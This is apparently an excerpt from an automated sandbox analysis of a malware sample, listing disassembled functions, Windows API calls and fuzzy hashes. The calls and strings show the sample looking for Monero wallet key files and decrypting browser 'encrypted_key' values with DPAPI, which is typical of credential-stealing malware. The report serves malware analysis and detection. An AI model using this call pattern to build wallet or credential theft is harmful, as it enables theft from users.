                  • Opcode Fuzzy Hash: 7cd9aef5bb63d28dac76d10aa509022b24cf557d3617f684b8d33b354f6ba8d2
                  • Instruction Fuzzy Hash: AB211AB5A80308ABDB14DF98DD49FAEBBB8FB49711F104159F605E7390C779A9008BA1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00B1951E,00000000), ref: 00B18D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B18D62
                  • wsprintfW.USER32 ref: 00B18D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: 8029aaafd2f99642a57ba77ea342f85c0e1b9b99fc8d055a9a2f809910a98ae8
                  • Instruction ID: 41c775f97cebae6e877b9e45ad7f3619a1f6ecc49bcf51598e928fd8d7c2ca6c
                  • Opcode Fuzzy Hash: 8029aaafd2f99642a57ba77ea342f85c0e1b9b99fc8d055a9a2f809910a98ae8
                  • Instruction Fuzzy Hash: 6EE0E675A90308BBD710DF98DD09E5977B8EB45701F004195FD09D7350D9715E109F66
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B18B60: GetSystemTime.KERNEL32(00B20E1A,011FA058,00B205AE,?,?,00B013F9,?,0000001A,00B20E1A,00000000,?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B18B86
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B0A2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 00B0A3FF
                  • lstrlen.KERNEL32(00000000), ref: 00B0A6BC
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 00B0A743
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 8473239962e06cfc783101326b379a8bd1f83b4a18a34ad325b4eb839d3c735d
                  • Instruction ID: da3ca989440cd7e2813cb850c236dbfae46319bf67e9cd11637c7922253efa14
                  • Opcode Fuzzy Hash: 8473239962e06cfc783101326b379a8bd1f83b4a18a34ad325b4eb839d3c735d
                  • Instruction Fuzzy Hash: FFE1F5728111189BDB05FBA4DD91EEE737CAF14310F908599F516B6091EF307A8ACB72
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B18B60: GetSystemTime.KERNEL32(00B20E1A,011FA058,00B205AE,?,?,00B013F9,?,0000001A,00B20E1A,00000000,?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B18B86
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B0D481
                  • lstrlen.KERNEL32(00000000), ref: 00B0D698
                  • lstrlen.KERNEL32(00000000), ref: 00B0D6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 00B0D72B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 016bfe36e2432919d864114882b3d8bae19a552a05bbf8d7d58f51021fd5928b
                  • Instruction ID: 6fff990be55d8a818484e3cc15bf971cacaef2641e02a1bfeef4d56fa58c9582
                  • Opcode Fuzzy Hash: 016bfe36e2432919d864114882b3d8bae19a552a05bbf8d7d58f51021fd5928b
                  • Instruction Fuzzy Hash: 329111728111089BDB04FBA4DD96DEE73B8AF14310F9041A9F517B6191EF347A8ACB72
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B18B60: GetSystemTime.KERNEL32(00B20E1A,011FA058,00B205AE,?,?,00B013F9,?,0000001A,00B20E1A,00000000,?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B18B86
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B0D801
                  • lstrlen.KERNEL32(00000000), ref: 00B0D99F
                  • lstrlen.KERNEL32(00000000), ref: 00B0D9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 00B0DA32
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 40ddbae08389eff940f04e709a8bf6125b589ea9107f121e6b77fac2a61ab910
                  • Instruction ID: fd8366b6cff4aef7bdc975bc7578b4ddbe50f94fda09f69c480fa21517a326e4
                  • Opcode Fuzzy Hash: 40ddbae08389eff940f04e709a8bf6125b589ea9107f121e6b77fac2a61ab910
                  • Instruction Fuzzy Hash: CB8121729111089BCB04FBA4DD96DEE73B8AF14310F8045A9F507B6191EF347A8ACB72
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: 953de6e220bfc5563d585ffb9acea5e75b123e5e7713d8f299b4fa18b8970984
                  • Instruction ID: 37de0902b0e5657caeafd7cd3f3ea11b8f51edb292bab8f3c0a94a613bea230d
                  • Opcode Fuzzy Hash: 953de6e220bfc5563d585ffb9acea5e75b123e5e7713d8f299b4fa18b8970984
                  • Instruction Fuzzy Hash: 994160B1D14209AFCB04EFA4D985AEEB7F8EF54704F448058E41677291EB34AA85CFA1
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B099EC
                    • Part of subcall function 00B099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B09A11
                    • Part of subcall function 00B099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B09A31
                    • Part of subcall function 00B099C0: ReadFile.KERNEL32(000000FF,?,00000000,00B0148F,00000000), ref: 00B09A5A
                    • Part of subcall function 00B099C0: LocalFree.KERNEL32(00B0148F), ref: 00B09A90
                    • Part of subcall function 00B099C0: CloseHandle.KERNEL32(000000FF), ref: 00B09A9A
                    • Part of subcall function 00B18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B18E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00B09D39
                    • Part of subcall function 00B09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B04EEE,00000000,00000000), ref: 00B09AEF
                    • Part of subcall function 00B09AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00B04EEE,00000000,?), ref: 00B09B01
                    • Part of subcall function 00B09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B04EEE,00000000,00000000), ref: 00B09B2A
                    • Part of subcall function 00B09AC0: LocalFree.KERNEL32(?,?,?,?,00B04EEE,00000000,?), ref: 00B09B3F
                    • Part of subcall function 00B09B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B09B84
                    • Part of subcall function 00B09B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00B09BA3
                    • Part of subcall function 00B09B60: LocalFree.KERNEL32(?), ref: 00B09BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: a34fd592556fef472d7b6376e22a15f375f190a705ec5e4fbf733287624aa1cc
                  • Instruction ID: 16494c9a04a0955a362664c1f3b04e282455210568eeb1ae12f965c5da97b242
                  • Opcode Fuzzy Hash: a34fd592556fef472d7b6376e22a15f375f190a705ec5e4fbf733287624aa1cc
                  • Instruction Fuzzy Hash: CB3132B5D10109ABCB14EFE4DC85AEE7BF8FB48304F5445A8E915A7282E7349A44CBA1
                  APIs
                  • CreateFileA.KERNEL32(00B13AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00B13AEE,?), ref: 00B192FC
                  • GetFileSizeEx.KERNEL32(000000FF,00B13AEE), ref: 00B19319
                  • CloseHandle.KERNEL32(000000FF), ref: 00B19327
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID:
                  • API String ID: 1378416451-0
                  • Opcode ID: cd0c2ed6c17acf4030dde7b5c1b17c9009fc784ba604f05a93d0251848d6ed4e
                  • Instruction ID: 3cf48bd31808019bb281405bb2c4df4fb661d8d8ed8e631b7fb887ea2903469a
                  • Opcode Fuzzy Hash: cd0c2ed6c17acf4030dde7b5c1b17c9009fc784ba604f05a93d0251848d6ed4e
                  • Instruction Fuzzy Hash: 9FF03C39E80308BBDB20DFB4EC59B9E77F9EB48710F508294B661E72C0D6749A418B54
                  APIs
                  • __getptd.LIBCMT ref: 00B1C74E
                    • Part of subcall function 00B1BF9F: __amsg_exit.LIBCMT ref: 00B1BFAF
                  • __getptd.LIBCMT ref: 00B1C765
                  • __amsg_exit.LIBCMT ref: 00B1C773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00B1C797
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 1ff1af37854c75a688c8fbf0f79fa042d9e07c599aa3812e9e74c8f7f8448743
                  • Instruction ID: 4466ab969bd3927a84038dafc8e79858040cea01ccf9ac7abc7f01005cfa8ccc
                  • Opcode Fuzzy Hash: 1ff1af37854c75a688c8fbf0f79fa042d9e07c599aa3812e9e74c8f7f8448743
                  • Instruction Fuzzy Hash: 50F030329857109BD721BBB85846FDD3BE0AF00721FA441C9F414A71D2DFA46DC29E5A
                  APIs
                    • Part of subcall function 00B18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B18E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00B14F7A
                  • lstrcat.KERNEL32(?,00B21070), ref: 00B14F97
                  • lstrcat.KERNEL32(?,011F8A50), ref: 00B14FAB
                  • lstrcat.KERNEL32(?,00B21074), ref: 00B14FBD
                    • Part of subcall function 00B14910: wsprintfA.USER32 ref: 00B1492C
                    • Part of subcall function 00B14910: FindFirstFileA.KERNEL32(?,?), ref: 00B14943
                    • Part of subcall function 00B14910: StrCmpCA.SHLWAPI(?,00B20FDC), ref: 00B14971
                    • Part of subcall function 00B14910: StrCmpCA.SHLWAPI(?,00B20FE0), ref: 00B14987
                    • Part of subcall function 00B14910: FindNextFileA.KERNEL32(000000FF,?), ref: 00B14B7D
                    • Part of subcall function 00B14910: FindClose.KERNEL32(000000FF), ref: 00B14B92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: 8a58ee84ba825f21e485e0a290aa8ac49d0b56a6d5c1dc5b6fc4501c590d31d6
                  • Instruction ID: 3e2168070eaed4a18daea89e95257e9e2982db85262c4ff34dadb9c0f223dd59
                  • Opcode Fuzzy Hash: 8a58ee84ba825f21e485e0a290aa8ac49d0b56a6d5c1dc5b6fc4501c590d31d6
                  • Instruction Fuzzy Hash: D121FB7A94030467C754FFB4EC46EED33BCAB55300F4045D4B649D6191EE7496C98BB2